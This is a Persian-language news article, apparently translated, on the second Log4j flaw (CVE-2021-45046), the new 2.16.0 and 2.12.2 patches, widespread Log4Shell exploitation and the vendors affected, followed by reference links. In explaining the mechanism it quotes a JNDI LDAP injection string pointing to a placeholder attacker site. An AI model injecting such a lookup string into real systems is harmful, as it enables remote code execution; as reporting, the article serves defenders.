کشف دومین آسیب‌پذیری Log4j (CVE-2021-45046) و انتشار وصله موردنیاز

به‌روزرسانی: امتیاز شدت CVE-2021-45046، که در ابتدا به‌عنوان یک اشکال DoS طبقه‌بندی ‌شده بود، از ۳٫۷ به ۹٫۰ بازبینی شده است تا منعکس‌کننده این واقعیت باشد که یک مهاجم می‌تواند از یک آسیب‌پذیری برای ارسال یک رشته دستکاری‌شده‌ی ویژه که منجر به “نشت اطلاعات و اجرای کد از راه دور در برخی محیط‌ها و اجرای کد محلی در همه محیط‌ها می‌شود سوءاستفاده کند.”

بنیاد نرم‌افزار آپاچی (ASF) پس‌ازاینکه وصله قبلی برای بهره‌بردار Log4Shell اخیراً فاش شده[۱]، «در برخی از تنظیماتِ غیر پیش‌فرض ناقص» در نظر گرفته شد، اصلاح جدیدی را برای ابزار ورود به سیستم Log4j ارائه کرده است.

دومین آسیب‌پذیری که با نام CVE-2021-45046 شناسایی می‌شود[۲]، دارای امتیاز ۳٫۷ از حداکثر ۱۰ در سیستم رتبه‌بندی CVSS است و تمامی نسخه‌های Log4j از ۲٫۰ تا بتا ۹ و از ۲٫۱۲٫۱ و ۲٫۱۳٫۰ تا ۲٫۱۵٫۰ را تحت تأثیر قرار می‌دهد. سازندگان این پروژه هفته گذشته برای رسیدگی به یک آسیب‌پذیری اجرای کد از راه دور حیاتی (CVE-2021-44228) که می‌تواند برای نفوذ و کنترل سیستم‌ها مورد سوءاستفاده قرار گیرد، وصله‌ای منتشر کردند.

ASF در یک توصیه جدید گفت[۳] که وصله‌ی منتشرشده‌ی ناقص برای CVE-2021-44228 می‌تواند[۴] برای ایجاد داده‌های ورودی مخرب با استفاده از الگوی[۵] جستجوی JNDI که منجر به حمله انکار سرویس (DoS) می‌شود، مورد سوءاستفاده قرار گیرد. آخرین نسخه Log4j یعنی ۲٫۱۶٫۰ (برای کاربرانی که به جاوا ۸ یا جدیدتر نیاز دارند)، همه پشتیبانی از جستجوی پیام را حذف می‌کند[۶] و JNDI را به‌طور پیش‌فرض غیرفعال می‌کند، مؤلفه‌ای که در قلب این آسیب‌پذیری قرار دارد. به کاربرانی که به جاوا ۷ نیاز دارند توصیه می‌شود پس از در دسترس قرار گرفتن Log4j نسخه خود را به نسخه ۲٫۱۲٫۲ ارتقا دهند.

Ralph Goers از ASF دراین‌باره توضیح داد[۷]: «برخورد با CVE-2021-44228 نشان داده است که JNDI دارای مشکلات امنیتی مهمی است. درحالی‌که ما آنچه را که می‌دانیم وصله کرده‌ایم، اما غیرفعال کردن کامل آن به‌طور پیش‌فرض برای کاربران ایمن‌تر خواهد بود، به‌خصوص که بعید است اکثریت کاربران از آن استفاده کنند.»

JNDI، مخفف Java Naming and Directory Interface، یک API جاوا است که به برنامه‌های کدگذاری شده در زبان برنامه‌نویسی امکان می‌دهد داده‌ها و منابعی مانند سرورهای LDAP را جستجو کنند[۸]. Log4Shell در کتابخانه Log4j ساکن است و یک چارچوب لاگ منبع باز و مبتنی بر جاوا است که معمولاً در وب سرورهای آپاچی گنجانده شده است.

این مشکل زمانی رخ می‌دهد که مؤلفه JNDI رابط LDAP برای تزریق یک درخواست مخرب LDAP استفاده می‌شود، چیزی شبیه به “${jndi:ldap://attacker_controled_website/payload_to_be_executed}”، زمانی که به یک وب سرور که نسخه آسیب‌پذیری از این کتابخانه را اجرا می‌کند وارد شوید و دشمن را قادر می‌سازد تا یک payload را از یک دامنه راه دور بازیابی کند و آن را به‌صورت محلی اجرا کند.

آخرین به‌روزرسانی زمانی ارائه شد که عواقب این نقص منجر به یک «همه‌گیری سایبری واقعی» شده است، چیزی که چندین عامل تهدید Log4Shell را به روش‌هایی که زمینه را برای حملات بیشتر[۹] فراهم می‌کند، ازجمله استقرار minerهای سکه، تروجان‌های دسترسی از راه دور و باج‌افزار در ماشین‌های حساس، تصاحب کردند. گفته می‌شود که نفوذهای فرصت‌طلبانه حداقل از اول دسامبر آغاز شده‌اند، اگرچه این اشکال در ۹ دسامبر به‌طور عمومی شناخته شد.

این نقص امنیتی زنگ خطر گسترده‌ای را برانگیخته است زیرا در یک چارچوب لاگ تقریباً همه‌جا و در برنامه‌های جاوا وجود دارد و به مهاجمان دروازه‌ای بی‌سابقه برای نفوذ و به خطر انداختن میلیون‌ها دستگاه در سراسر جهان ارائه می‌کند.

این نقص قابل بهره‌برداری از راه دور صدها[۱۰] محصول بزرگ سازمانی[۱۱] از تعدادی از شرکت‌ها مانند Akamai، Amazon، Apache، Apereo، Atlassian، Broadcom، Cisco، Cloudera، ConnectWise، Debian، Docker، Fortinet، Google، IBM، Intel، Juniper Networks، Microsoft، Okta، Oracle، Red Hat، SolarWinds، SonicWall، Splunk، Ubuntu، VMware، Zscaler و Zoho را نیز تحت تأثیر قرار می‌دهد[۱۲-۳۸] و یک ریسک قابل‌توجه در زنجیره تأمین نرم‌افزار است.

شرکت امنیتی Check Point دراین‌باره گفت[۳۹]: “برخلاف سایر حملات سایبری بزرگ که شامل یک یا تعداد محدودی نرم‌افزار است، Log4j اساساً در هر محصول یا سرویس وب مبتنی بر جاوا تعبیه ‌شده است. اصلاح دستی آن بسیار دشوار است. این آسیب‌پذیری، به دلیل پیچیدگی در وصله آن و سهولت بهره‌برداری، به نظر می‌رسد که تا سال‌های آینده با ما باقی خواهد ماند، مگر اینکه شرکت‌ها سریعاً با اجرای حفاظتی برای جلوگیری از حملات به محصولات خود اقدام کنند.”

در روزهای پس از فاش شدن این اشکال، حداقل ده گروه مختلف[۴۰] وارد گروه بهره‌برداری شده‌اند و تقریباً ۴۴ درصد از شبکه‌های شرکتی در سراسر جهان قبلاً موردحمله قرار گرفته‌اند که نشان‌دهنده تشدید قابل‌توجهی از این نوع است. علاوه بر این، باندهای جنایی که به‌عنوان واسطه‌های دسترسی[۴۱] عمل می‌کنند، شروع به استفاده از این آسیب‌پذیری برای به دست آوردن جایگاه اولیه در شبکه‌های هدف کرده‌اند و سپس دسترسی به باج‌افزار به‌عنوان سرویس (RaaS) را نیز می‌فروشند.

این موضوع همچنین شامل بازیگران تحت حمایت دولت از چین، ایران، کره شمالی و ترکیه می‌شود و مایکروسافت خاطرنشان می‌کند[۴۲] که “گستره‌ی فعالیت‌ها از آزمایش در هنگام توسعه، ادغام آسیب‌پذیری به‌منظور استقرار payload در سطح اینترنت و بهره‌برداری علیه اهداف تا رسیدن به اهداف مهاجم می‌شود.”

مسلح‌سازی در مقیاس بزرگِ این نقصِ اجرای کد از راه دور، آژانس امنیت سایبری و امنیت زیرساخت ایالات‌متحده (CISA) را بر آن داشته است که Log4Shell را به کاتالوگ آسیب‌پذیری‌های مورد بهره‌برداری شناخته‌شده[۴۳] خود اضافه کند و به آژانس‌های فدرال مهلتی تا ۲۴ دسامبر داده است تا وصله‌های این آسیب‌پذیری‌ها را پیاده‌سازی کنند‌ و فروشندگان را مجبور کردند[۴۴] تا “محصولات آسیب‌دیده با Log4j را شناسایی و وصله کنند.”

Sean Gallagher، محقق ارشد تهدید در Sophos، هشدار داد که «دشمنان احتمالاً به هر آنچه می‌توانند در حال حاضر دسترسی دارند و یا با هدف کسب درآمد و یا سرمایه‌گذاری روی آن بعداً، دسترسی پیدا می‌کنند» و افزود: «این آرامشی قبل از طوفان ازنظر فعالیت‌های شرورتر در مورد آسیب‌پذیری Log4Shell است.»

Gallagher در این مورد می‌افزاید: “فوری‌ترین اولویت برای مدافعان کاهش قرار گرفتن در معرض حملات با وصله کردن تمام گوشه‌های زیرساخت آن‌ها و بررسی سیستم‌های در معرض خطر و بالقوه‌ی در معرض خطر است. این آسیب‌پذیری می‌تواند در همه‌جا وجود داشته باشد.”

منابع

[۱] https://apa.aut.ac.ir/?p=8517

[۲] https://nvd.nist.gov/vuln/detail/CVE-2021-45046

[۳] https://logging.apache.org/log4j/2.x/security.html

[۴] https://nvd.nist.gov/vuln/detail/CVE-2021-44228

[۵] https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface

[۶] https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0

[۷] https://issues.apache.org/jira/browse/LOG4J2-3208

[۸] https://en.wikipedia.org/wiki/LDAP

[۹] https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html

[۱۰] https://github.com/NCSC-NL/log4shell

[۱۱] https://github.com/cisagov/log4j-affected-db

[۱۲] https://developer.akamai.com/tools/integrations/siem/siem-cef-connector

[۱۳] https://aws.amazon.com/security/security-bulletins/AWS-2021-006

[۱۴] https://blogs.apache.org/foundation/entry/apache-log4j-cves

[۱۵] https://apereo.github.io/2021/12/11/log4j-vuln

[۱۶] https://confluence.atlassian.com/security/multiple-products-security-advisory-log4j-vulnerable-to-remote-code-execution-cve-2021-44228-1103069934.html

[۱۷] https://support.broadcom.com/security-advisory/content/security-advisories/Symantec-Security-Advisory-for-Log4j-2-CVE-2021-44228-Vulnerability/SYMSA19793

[۱۸] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd

[۱۹] https://blog.cloudera.com/cloudera-response-to-cve-2021-44228

[۲۰] https://www.connectwise.com/company/trust/advisories

[۲۱] https://security-tracker.debian.org/tracker/CVE-2021-44228

[۲۲] https://www.docker.com/blog/apache-log4j-2-cve-2021-44228

[۲۳] https://www.fortiguard.com/psirt/FG-IR-21-245

[۲۴] https://cloud.google.com/log4j2-security-advisory

[۲۵] https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-websphere-application-server-cve-2021-44228

[۲۶] https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html

[۲۷] https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11259

[۲۸] https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2

[۲۹] https://sec.okta.com/articles/2021/12/log4shell

[۳۰] https://blogs.oracle.com/security/post/cve-2021-44228

[۳۱] https://access.redhat.com/security/vulnerabilities/RHSB-2021-009#updates-for-affected-products

[۳۲] https://www.solarwinds.com/trust-center/security-advisories/cve-2021-44228

[۳۳] https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032

[۳۴] https://www.splunk.com/en_us/blog/bulletins/splunk-security-advisory-for-apache-log4j-cve-2021-44228.html

[۳۵] https://ubuntu.com/security/CVE-2021-44228

[۳۶] https://www.vmware.com/security/advisories/VMSA-2021-0028.html

[۳۷] https://trust.zscaler.com/posts/9581

[۳۸] https://pitstop.manageengine.com/portal/en/community/topic/apache-log4j-vulnerability-cve-2021-44228-1

[۳۹] https://blog.checkpoint.com/2021/12/13/the-numbers-behind-a-cyber-pandemic-detailed-dive

[۴۰] https://blog.netlab.360.com/ten-families-of-malicious-samples-are-spreading-using-the-log4j2-vulnerability-now

[۴۱] https://thehackernews.com/2021/11/blackberry-uncover-initial-access.html

[۴۲] https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation

[۴۳] https://www.cisa.gov/known-exploited-vulnerabilities-catalog

[۴۴] https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance

[۴۵] https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html